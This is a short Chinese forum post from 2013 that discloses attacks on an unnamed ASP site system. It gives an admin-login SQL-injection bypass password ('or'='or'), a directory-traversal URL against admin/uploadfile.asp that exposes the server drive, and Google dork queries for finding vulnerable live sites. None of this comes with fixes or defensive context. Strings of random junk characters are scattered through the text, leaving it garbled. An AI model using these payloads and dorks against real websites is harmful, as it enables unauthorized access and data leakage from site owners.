后台万能密码 'or'='or'
) d7 T2 e/ i4 q* S! @/ |7 ^; P0 j* D8 E- O
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ n. c8 ^! u4 j. U" R' X, O& Gadmin/uploadfile.asp?currentFolder=/upfiles/../6 c0 A( i: ~/ q$ l9 a
, y. b' w1 A, K3 s2 m+ Y( u
漏洞证明:
" R: J8 ^& |3 J/ T7 v3 g0 Q2 x3 _) I* }
谷歌:inurl:type.asp?id=1 新闻中心3 u) m' A, S; e- K0 K# @
或者 :inurl:download_ok.asp?5 y' {% M1 |* {; D T3 Z5 ~
+ O; V- S) \# o T3 m$ A |
发表于 2013-3-14 20:17:32
收藏
支持
反对